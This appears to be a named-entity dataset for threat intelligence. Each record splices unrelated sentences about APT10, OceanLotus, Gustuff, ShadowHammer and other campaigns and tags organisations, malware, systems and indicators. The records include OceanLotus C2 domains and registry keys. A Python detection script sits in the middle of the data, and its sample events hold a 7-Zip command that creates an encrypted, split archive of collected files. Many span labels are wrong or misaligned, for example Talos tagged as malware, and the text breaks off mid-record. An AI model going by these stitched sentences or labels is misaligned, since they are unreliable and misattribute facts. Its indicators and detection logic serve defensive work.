While COSMICENERGY \u2019s capabilities are not significantly different from previous OT malware families \u2019 , its discovery highlights several notable developments in the OT threat landscape .", "spans": [{"start": 69, "end": 74, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 292, "end": 306, "label": "Indicator"}, {"start": 320, "end": 335, "label": "Malware"}, {"start": 395, "end": 414, "label": "Malware"}]} {"text": "Again , the concept is that new victims are more likely to install the malware if the SMS comes from someone they know . Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis . OceanLotus : manongrover.com 7244 . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": [{"start": 145, "end": 157, "label": "Organization"}, {"start": 445, "end": 455, "label": "Organization"}, {"start": 458, "end": 473, "label": "Indicator"}, {"start": 512, "end": 519, "label": "Organization"}]} {"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX . OceanLotus : background.ristians.com:8888 11b4 . 
They contain some invalid URLs and IPs .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 213, "end": 223, "label": "System"}, {"start": 336, "end": 341, "label": "System"}, {"start": 344, "end": 354, "label": "Organization"}, {"start": 357, "end": 385, "label": "Indicator"}, {"start": 398, "end": 431, "label": "Indicator"}]} {"text": "If the device does not meet the criteria , it wo n't receive any data , otherwise , it will be redirected to a second server to receive a copy of the malware to install on their device . It is highly likely that this is due to the release of the 2013 FireEye report . OceanLotus : enum.arkoorr.com:8531 11b4 . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 251, "end": 258, "label": "Organization"}, {"start": 268, "end": 278, "label": "Organization"}, {"start": 281, "end": 302, "label": "Indicator"}, {"start": 310, "end": 320, "label": "System"}]} {"text": "The domain on this campaign was registered on Jan. 19 , 2019 . Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions . OceanLotus : worker.baraeme.com:8888 11b4 . 
The Platform can look for indicators across file attachments , embedded links , and more and provides in-platform scoring .", "spans": [{"start": 125, "end": 130, "label": "Organization"}, {"start": 170, "end": 174, "label": "Organization"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 292, "end": 315, "label": "Indicator"}, {"start": 327, "end": 335, "label": "System"}]} {"text": "However , Talos has identified that was used at least since November 2018 . MSPs therefore represent a high-payoff target for espionage-focused threat actors such as APT10 . OceanLotus : enum.arkoorr.com:8888 11b4 . The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 76, "end": 80, "label": "Organization"}, {"start": 144, "end": 157, "label": "Organization"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 187, "end": 208, "label": "Indicator"}, {"start": 220, "end": 242, "label": "Indicator"}, {"start": 253, "end": 261, "label": "Organization"}, {"start": 326, "end": 334, "label": "Organization"}, {"start": 351, "end": 359, "label": "Organization"}, {"start": 370, "end": 395, "label": "Organization"}]} {"text": "During the investigation , Talos was also able to determine that the same infrastructure has been used to deploy similar campaigns using different versions of the malware . Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims . 
OceanLotus : worker.baraeme.com:8531 11b4 . The UK \u2019s National Cyber Security Centre ( NCSC ) assesses that the Russian Military Intelligence was almost certainly involved in the 13 January defacements of Ukrainian government websites and the deployment of Whispergate destructive malware .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 214, "end": 218, "label": "Organization"}, {"start": 231, "end": 236, "label": "Organization"}, {"start": 260, "end": 263, "label": "System"}, {"start": 409, "end": 419, "label": "Organization"}, {"start": 422, "end": 445, "label": "Indicator"}, {"start": 457, "end": 502, "label": "Organization"}, {"start": 517, "end": 550, "label": "Organization"}, {"start": 614, "end": 643, "label": "Organization"}, {"start": 666, "end": 697, "label": "Malware"}]} {"text": "Distribution of victims . This , in turn , would provide access to a larger amount of intellectual property and sensitive data . OceanLotus : plan.evillese.com:8531 11b4 . Seven of the vulnerabilities included in today \u2019s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": [{"start": 129, "end": 139, "label": "Organization"}, {"start": 142, "end": 164, "label": "Indicator"}, {"start": 251, "end": 298, "label": "Indicator"}]} {"text": "Talos assess with high confidence that this campaign is targeting Australian financial institutions based on several factors . APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences . OceanLotus : background.ristians.com:8531 11b4 . Copies of the site at archive.org show it was the work of someone calling themselves \u201c The Chaos Creator . 
\u201d", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 248, "end": 258, "label": "Organization"}, {"start": 261, "end": 289, "label": "Indicator"}, {"start": 384, "end": 401, "label": "Organization"}]} {"text": "Our Umbrella telemetry shows that the majority of the request comes from Australia and the majority of the phone numbers infected have the international indicative for Australia . The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains . OceanLotus : plan.evillese.com:8888 11b4 . The dump files will start ' NSPPE- ' .", "spans": [{"start": 236, "end": 241, "label": "Organization"}, {"start": 303, "end": 322, "label": "System"}, {"start": 325, "end": 335, "label": "Organization"}, {"start": 338, "end": 360, "label": "Indicator"}, {"start": 368, "end": 406, "label": "Indicator"}]} {"text": "Finally , the specific overlays are designed for Australian financial institutions , and Australia is one of the geographic regions that is accepted by the C2 . Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs . OceanLotus : SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B} 7244 . 
As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Territorial ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": [{"start": 256, "end": 261, "label": "Organization"}, {"start": 293, "end": 297, "label": "Organization"}, {"start": 300, "end": 310, "label": "Organization"}, {"start": 467, "end": 528, "label": "Organization"}, {"start": 539, "end": 546, "label": "Organization"}, {"start": 558, "end": 567, "label": "Organization"}]} {"text": "DNS queries distribution over time The campaign does n't seem to be growing at a fast pace . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . OceanLotus : SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz 7244 . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": [{"start": 191, "end": 196, "label": "Organization"}, {"start": 267, "end": 277, "label": "Organization"}, {"start": 280, "end": 342, "label": "System"}, {"start": 525, "end": 618, "label": "Indicator"}]} {"text": "Our data shows , on average , about three requests per hour to the drop host . These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies . OceanLotus : SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} 11b4 . 
In the UK , Vice Society accounts for a staggering proportion of known ransomware attacks on education \u2014 almost 70 % .", "spans": [{"start": 145, "end": 155, "label": "Organization"}, {"start": 223, "end": 232, "label": "Organization"}, {"start": 257, "end": 267, "label": "Organization"}, {"start": 351, "end": 363, "label": "Organization"}, {"start": 432, "end": 441, "label": "Organization"}]} {"text": "This request is only made upon installation , but there is no guarantee that it will be installed . APT10 has , in the past , primarily been known for its targeting of government and US defence industrial base organisations , with the earliest known date of its activity being in December 2009 . Operation ShadowHammer . At this time , it is unknown how Sandworm gained initial access to the victim .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 168, "end": 178, "label": "Organization"}, {"start": 354, "end": 362, "label": "Organization"}]} {"text": "This data , when analyzed with the number of commands to send SMSs that Talos received during the investigation , lead us to conclude that the malicious operator is aggressively spreading the malware , but that does n't seem to result in the same number of new infections . Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China . Earlier today , Motherboard published a story by Kim Zetter on Operation ShadowHammer , a newly discovered supply chain attack that leveraged ASUS Live Update software . 
Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": [{"start": 283, "end": 288, "label": "Organization"}, {"start": 420, "end": 431, "label": "Organization"}, {"start": 546, "end": 562, "label": "System"}, {"start": 583, "end": 595, "label": "Malware"}]} {"text": "Examples of the overlays available to the malware Above , you can see examples of the injections that distributed to the malware as part of this specific campaign . In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient . While the investigation is still in progress and full results and technical paper will be published during SAS 2019 conference in Singapore , we would like to share some important details about the attack . In several cases , the threat actor used 7 - zip to create an encrypted segmented archive to compress the reconnaissance results .", "spans": [{"start": 192, "end": 201, "label": "Organization"}, {"start": 222, "end": 234, "label": "Organization"}, {"start": 246, "end": 261, "label": "System"}, {"start": 561, "end": 568, "label": "System"}]} {"text": "While doing our investigation we were able to identify other malware packages with different names . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX . In January 2019 , we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility . 
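Two of the passages above are detection guidance rather than narrative: the advice to correlate process-creation and command-line telemetry with network connections so that binaries which never normally initiate traffic stand out, and the note that the actor staged reconnaissance output with 7-Zip as an encrypted, segmented archive. The following is an added example written for this page, not code from any vendor report quoted here. It joins constructed Sysmon-style process and network events on PID, checks each connection against a per-image port baseline, and separately flags 7-Zip "add" command lines that carry both a password (-p) and a volume-split (-v) switch. Every path, PID, address and the baseline itself are constructed for the example; a real baseline is learned from clean fleet telemetry.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed Sysmon-style sample events for this example (not real telemetry).
PROCESS_EVENTS = [
    {"pid": 1001, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\firefox.exe" -url https://example.test'},
    {"pid": 1002, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\victim\notes.txt"},
    {"pid": 1003, "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -pS3cret! -v50m C:\Users\Public\recon.7z C:\Users\victim\Documents\*"},
    {"pid": 1004, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]
NETWORK_EVENTS = [
    {"pid": 1001, "dst": "203.0.113.10", "dst_port": 443},
    {"pid": 1002, "dst": "198.51.100.7", "dst_port": 443},   # notepad does not initiate connections
    {"pid": 1004, "dst": "192.0.2.1", "dst_port": 53},
    {"pid": 1004, "dst": "198.51.100.9", "dst_port": 8080},  # svchost on a port outside its baseline
    {"pid": 1999, "dst": "198.51.100.9", "dst_port": 443},   # no process-creation record at all
]

# Constructed baseline: image basename -> destination ports it normally uses.
# In production this is learned from weeks of clean fleet telemetry, not typed in.
BASELINE: Dict[str, Set[int]] = {
    "firefox.exe": {80, 443},
    "svchost.exe": {53, 80, 443},
}


@dataclass
class Alert:
    pid: int
    image: str
    reason: str


_ARCHIVER_NAMES = {"7z.exe", "7za.exe", "7zg.exe", "7z", "7za"}
_VOLUME_FLAG = re.compile(r"-v\d+[bkmg]?", re.IGNORECASE)


def is_archive_staging(cmdline: str) -> bool:
    """True for a 7-Zip 'a' (add) command that both sets a password (-p...) and
    splits the output into volumes (-v<size>): the staging pattern described in the
    text. Whitespace tokenisation is deliberately crude; this is a hunting heuristic."""
    toks = cmdline.split()
    if not toks or ntpath.basename(toks[0].strip('"')).lower() not in _ARCHIVER_NAMES:
        return False
    args = toks[1:]
    return ("a" in args
            and any(t.startswith("-p") for t in args)
            and any(_VOLUME_FLAG.fullmatch(t) for t in args))


def correlate(process_events, network_events) -> List[Alert]:
    """Join each connection to the process that made it and flag deviations from
    the per-image port baseline, then flag archive-staging command lines."""
    by_pid = {p["pid"]: p for p in process_events}
    alerts: List[Alert] = []
    for net in network_events:
        where = f"{net['dst']}:{net['dst_port']}"
        proc = by_pid.get(net["pid"])
        if proc is None:
            alerts.append(Alert(net["pid"], "<unknown>", f"connection to {where} with no process-creation record"))
            continue
        allowed = BASELINE.get(ntpath.basename(proc["image"]).lower())
        if allowed is None:
            alerts.append(Alert(proc["pid"], proc["image"], f"not a known network initiator, yet connected to {where}"))
        elif net["dst_port"] not in allowed:
            alerts.append(Alert(proc["pid"], proc["image"], f"known initiator on unbaselined port {net['dst_port']} ({where})"))
    for proc in process_events:
        if is_archive_staging(proc["cmdline"]):
            alerts.append(Alert(proc["pid"], proc["image"], "encrypted, split archive created from the command line (possible staging of collected data)"))
    return alerts


if __name__ == "__main__":
    for a in correlate(PROCESS_EVENTS, NETWORK_EVENTS):
        print(f"pid={a.pid} image={a.image}: {a.reason}")
```

On the constructed input this raises four alerts: notepad.exe connecting at all, svchost.exe on 8080, a connection with no matching process record, and the 7z.exe staging command. The join on PID is the weak point in real data (PIDs are reused), so a production version keys on the process GUID that Sysmon supplies for both event types.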
The backdoor \u2019s primary functionality involves retrieving and executing additional modules .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 224, "end": 234, "label": "System"}, {"start": 238, "end": 243, "label": "System"}, {"start": 328, "end": 352, "label": "System"}, {"start": 355, "end": 445, "label": "Malware"}]} {"text": "Some of these might have been used on old campaigns or were already prepared for new campaigns . We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials . The attack took place between June and November 2018 and according to our telemetry , it affected a large number of users . \u2013 Consistent with KillNet activity in 2022 , the majority of claimed attacks in 2023 targeted entities in the U.S. and Europe .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 172, "end": 175, "label": "System"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 363, "end": 379, "label": "Organization"}]} {"text": "MALWARE TECHNICAL DETAILS During our investigation , researchers uncovered a malware known as \" Gustuff. '' . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . ASUS Live Update is an utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS , UEFI , drivers and applications . 
The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 \u2019s domain for hosting his own private blog .", "spans": [{"start": 96, "end": 104, "label": "Malware"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 210, "end": 218, "label": "System"}, {"start": 222, "end": 228, "label": "System"}, {"start": 247, "end": 271, "label": "System"}, {"start": 342, "end": 358, "label": "System"}, {"start": 403, "end": 407, "label": "Organization"}, {"start": 481, "end": 485, "label": "System"}, {"start": 488, "end": 492, "label": "System"}, {"start": 495, "end": 502, "label": "System"}, {"start": 507, "end": 519, "label": "System"}, {"start": 544, "end": 560, "label": "Indicator"}, {"start": 575, "end": 583, "label": "Indicator"}, {"start": 595, "end": 612, "label": "Organization"}]} {"text": "Given the lack of indicators of compromise , we decided to check to see if this was the same malware we had been researching . APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots . According to Gartner , ASUS is the world\u2019s 5th-largest PC vendor by 2017 unit sales . 
Over the last decade , Iran has waged a number of disruptive and destructive cyber campaigns against government entities and companies alike , becoming infamous for its deployment of wiper malware as well as its retaliatory attack strategy .", "spans": [{"start": 127, "end": 132, "label": "Organization"}, {"start": 188, "end": 203, "label": "System"}, {"start": 207, "end": 223, "label": "System"}, {"start": 314, "end": 321, "label": "Organization"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 410, "end": 414, "label": "Organization"}, {"start": 437, "end": 479, "label": "Organization"}, {"start": 488, "end": 507, "label": "Organization"}, {"start": 512, "end": 521, "label": "Organization"}]} {"text": "Our Threat Intelligence and Interdiction team found the Gustuff malware being advertised in the Exploit.in forum as a botnet for rent . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . This makes it an extremely attractive target for APT groups that might want to take advantage of their userbase . Organizations must do better to safeguard their sensitive data and combat the growing ransomware threats by leveraging key prevention , detection and response components .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 96, "end": 106, "label": "Indicator"}, {"start": 235, "end": 247, "label": "Organization"}]} {"text": "The seller , known as \" bestoffer , '' was , at some point , expelled from the forum . In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network . 
Based on our statistics , over 57 , 000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time . The connection to the Lazarus group was obvious by inspecting the tools , strategies , and methods already linked to the North Korean actor .", "spans": [{"start": 116, "end": 121, "label": "Organization"}, {"start": 136, "end": 149, "label": "System"}, {"start": 153, "end": 156, "label": "System"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 301, "end": 310, "label": "Organization"}, {"start": 373, "end": 389, "label": "System"}, {"start": 432, "end": 449, "label": "Organization"}, {"start": 465, "end": 512, "label": "Organization"}, {"start": 531, "end": 553, "label": "Organization"}]} {"text": "Gustuff advertising screenshot The companies advertised in the image above were from Australia , which matches up with the campaign we researched . The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing . We are not able to calculate the total count of affected users based only on our data ; however , we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide . Network traffic and process related telemetry to / from host(s ) operating the MicroSCADA software .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 184, "end": 192, "label": "System"}, {"start": 203, "end": 209, "label": "System"}, {"start": 228, "end": 237, "label": "System"}]} {"text": "The screenshots provided by the author align with the advertised features and the features that we discovered while doing our analysis . Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest . 
The goal of the attack was to surgically target an unknown pool of users , which were identified by their network adapters\u2019 MAC addresses . It is a challenge for any organisation to fight off a determined ransomware gang like Vice Society , but schools face the added pressure of doing so in a notoriously tight budgetary environment .", "spans": [{"start": 209, "end": 216, "label": "Organization"}, {"start": 486, "end": 501, "label": "Organization"}, {"start": 507, "end": 519, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}]} {"text": "Admin panel The administration panel shows the application configuration , which matches the commands from the C2 . We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools . To achieve this , the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation . For the latest protection updates , please visit the Symantec Protection Bulletin .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 490, "end": 498, "label": "Organization"}]} {"text": "Country selection The administration console screenshots also show the ability to filter the results by country . For example , PwC UK has observed APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads . We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack . 
COSMICENERGY \u2019s capabilities and overall attack strategy appear reminiscent of the , which issued IEC-104 ON / OFF commands to interact with RTUs and , according to one , may have made use of an MSSQL server as a conduit system to access OT .", "spans": [{"start": 128, "end": 134, "label": "Organization"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 192, "end": 200, "label": "System"}, {"start": 205, "end": 212, "label": "System"}, {"start": 238, "end": 253, "label": "System"}, {"start": 417, "end": 432, "label": "Malware"}, {"start": 612, "end": 624, "label": "System"}]} {"text": "In this case , \" AU '' is the code shown , which is Australia . During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 . Of course , there might be other samples out there with different MAC addresses in their list . Monitor and analyze traffic patterns and packet inspection associated to protocol(s ) , leveraging SSL / TLS inspection for encrypted traffic , that do not follow the expected protocol standards and traffic flows ( e.g extraneous packets that do not belong to established flows , gratuitous or anomalous traffic patterns , anomalous syntax , or structure ) .", "spans": [{"start": 129, "end": 134, "label": "Organization"}, {"start": 503, "end": 561, "label": "Indicator"}, {"start": 564, "end": 604, "label": "Indicator"}, {"start": 607, "end": 638, "label": "Indicator"}]} {"text": "Based on this information , Talos assesses with high confidence that the malware is the same and this is , in fact , the Gustuff malware . We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves . We believe this to be a very sophisticated supply chain attack , which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques . 
Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 121, "end": 128, "label": "Malware"}, {"start": 202, "end": 216, "label": "System"}, {"start": 272, "end": 278, "label": "System"}, {"start": 283, "end": 292, "label": "System"}, {"start": 498, "end": 503, "label": "Organization"}, {"start": 519, "end": 533, "label": "Organization"}]} {"text": "Design In the manifest , the malware requests a large number of permissions . APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting . The reason that it stayed undetected for so long is partly due to the fact that the trojanized updaters were signed with legitimate certificates ( eg : \u201c ASUSTeK Computer Inc. \u201d ) . Each data item fills its location by calling function so , it will become like the following but with the victim collected data .", "spans": [{"start": 78, "end": 83, "label": "Organization"}, {"start": 141, "end": 153, "label": "Organization"}, {"start": 472, "end": 525, "label": "Malware"}]} {"text": "However , it does n't request permissions like BIND_ADMIN . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns . The malicious updaters were hosted on the official liveupdate01s.asus.com and liveupdate01.asus.com ASUS update servers . 
Given the widespread adoption of Citrix in enterprises globally , we suspect the number of impacted organizations is far greater and in several sectors .", "spans": [{"start": 103, "end": 108, "label": "Organization"}, {"start": 249, "end": 271, "label": "Indicator"}, {"start": 276, "end": 297, "label": "Indicator"}, {"start": 298, "end": 302, "label": "Organization"}, {"start": 353, "end": 359, "label": "System"}]} {"text": "To perform some of its activities , the malware does not need high privileges inside the device , as we will explain ahead . PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . We have contacted ASUS and informed them about the attack on Jan 31 , 2019 , supporting their investigation with IOCs and descriptions of the malware . \u2022 None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": [{"start": 125, "end": 131, "label": "Organization"}, {"start": 136, "end": 147, "label": "Organization"}, {"start": 171, "end": 179, "label": "Organization"}, {"start": 184, "end": 194, "label": "Organization"}, {"start": 307, "end": 311, "label": "Organization"}, {"start": 462, "end": 478, "label": "Vulnerability"}, {"start": 483, "end": 499, "label": "Vulnerability"}, {"start": 549, "end": 575, "label": "System"}]} {"text": "Permissions in the manifest This malware is designed to avoid detection and analysis . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims . Although precise attribution is not available at the moment , certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017 . 
Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": [{"start": 115, "end": 143, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 411, "end": 421, "label": "Organization"}]} {"text": "It has several protections in place , both in the C2 and the malware 's code . An additional campaign has also been observed targeting Japanese entities . The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": [{"start": 227, "end": 236, "label": "Organization"}, {"start": 259, "end": 265, "label": "Organization"}, {"start": 443, "end": 536, "label": "Indicator"}]} {"text": "The code is not only obfuscated but also packed . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue . BARIUM is an APT actor known to be using the Winnti backdoor . 
Its wellknown that ransomware can be delivered via unremediated vulnerabilities , but many security teams are overwhelmed by the sheer number they are facing .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 149, "end": 162, "label": "Organization"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 338, "end": 344, "label": "Organization"}, {"start": 383, "end": 398, "label": "Malware"}, {"start": 420, "end": 430, "label": "Malware"}]} {"text": "The packer , besides making the static analysis more complex , will break the standard debugger . The threat actor 's known working hours align to Chinese Standard Time ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 . Recently , our colleagues from ESET wrote about another supply chain attack in which BARIUM was also involved , that we believe is connected to this case as well . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for \u2022 None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services \u2022 None Consider application - level controls such as web application firewalls .", "spans": [{"start": 102, "end": 114, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 326, "end": 331, "label": "Organization"}, {"start": 365, "end": 369, "label": "Organization"}, {"start": 419, "end": 425, "label": "Organization"}, {"start": 498, "end": 516, "label": "System"}, {"start": 644, "end": 668, "label": "System"}, {"start": 673, "end": 736, "label": "Indicator"}, {"start": 768, "end": 788, "label": "Organization"}]} {"text": "Manifest activity declaration Class list inside the dex file The main malware classes are packed , to a point where the class defined in the 
manifest has a handler for the MAIN category that does not exist in the DEX file . APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 . It should be noted that the numbers are also highly influenced by the distribution of Kaspersky users around the world . The U.S. government is taking additional measures to fight against ransomware attacks through methods such as hacking cybercriminals back .", "spans": [{"start": 224, "end": 229, "label": "Organization"}, {"start": 232, "end": 246, "label": "Organization"}, {"start": 262, "end": 283, "label": "Organization"}, {"start": 289, "end": 296, "label": "Organization"}, {"start": 408, "end": 417, "label": "Organization"}, {"start": 447, "end": 462, "label": "Organization"}]} {"text": "Error when trying to debug the malware using the Android Studio IDE . Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. defense industrial base . In principle , the distribution of victims should match the distribution of ASUS users around the world . The UK has already sanctioned the GRU after their appalling actions in Salisbury , and has frozen more than \u00a3 940 billion worth of bank assets and \u00a3 117 billion in personal net worth from oligarchs and their family members who fund Putin \u2019s war machine .", "spans": [{"start": 49, "end": 67, "label": "System"}, {"start": 94, "end": 116, "label": "Organization"}, {"start": 121, "end": 132, "label": "Organization"}, {"start": 226, "end": 249, "label": "Organization"}, {"start": 392, "end": 395, "label": "Organization"}]} {"text": "One of the side effects of this packer is the inability of Android Studio IDE to debug the code . 
Moafee may have chosen its targets based on the rich resources of South China Sea region \u2013 the world 's second business sea-lane , according to Wikipedia \u2013 including rare earth metals , crude oil , and natural gas . We\u2019ve also created a tool which can be run to determine if your computer has been one of the surgically selected targets of this attack . Regardless of the cause , these leaks are having a significant effect on the threat landscape , making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge .", "spans": [{"start": 59, "end": 77, "label": "System"}, {"start": 98, "end": 104, "label": "Organization"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 308, "end": 311, "label": "Organization"}]} {"text": "This happens because the IDE executes the code from the Android debug bridge ( ADB ) by calling the activity declared in the manifest by name . DragonOK appears to operate out of China 's Jiangsu Province . To check this , it compares MAC addresses of all adapters to a list of predefined values hardcoded in the malware and alerts if a match was found . COSMICENERGY is the latest example of specialized OT malware capable of causing cyber physical impacts , which are rarely discovered or disclosed .", "spans": [{"start": 56, "end": 76, "label": "System"}, {"start": 144, "end": 152, "label": "Organization"}, {"start": 355, "end": 367, "label": "Malware"}, {"start": 393, "end": 415, "label": "Malware"}]} {"text": "Since the class does not exist at startup , the application does not run on the debugger . Moafee and DragonOK both use a well-known proxy tool \u2013 HUC Packet Transmit Tool ( HTRAN ) \u2013 to disguise their geographical locations . Download an archive with the tool ( .exe ) . 
8.15 Logging & 8.16 Monitoring activities \u2013 determining the system information to log , store and query allows malicious behavior to be uncovered , if threat intelligence is applied to understand how threats may manifest themselves within log data .", "spans": [{"start": 91, "end": 97, "label": "Organization"}, {"start": 102, "end": 110, "label": "Organization"}, {"start": 146, "end": 170, "label": "System"}, {"start": 173, "end": 178, "label": "System"}, {"start": 262, "end": 266, "label": "Indicator"}, {"start": 510, "end": 518, "label": "Vulnerability"}]} {"text": "Although Talos analyzed the unpacked version of the code , the packer analysis is beyond the scope of this post . However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups . Also , you may check MAC addresses online . StrifeWater is used to create a foothold in victim and environments , and it has various functions , including executing system commands , screen capturing , establishing persistence , listing system files , and downloading updates and additional modules .", "spans": [{"start": 9, "end": 14, "label": "Malware"}, {"start": 124, "end": 131, "label": "Organization"}, {"start": 221, "end": 227, "label": "Organization"}, {"start": 232, "end": 247, "label": "Organization"}, {"start": 294, "end": 305, "label": "Malware"}]} {"text": "Check code for emulators As part of its defense , the malware payload first checks for emulators to prevent analysis on sandboxes . Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim . If you discover 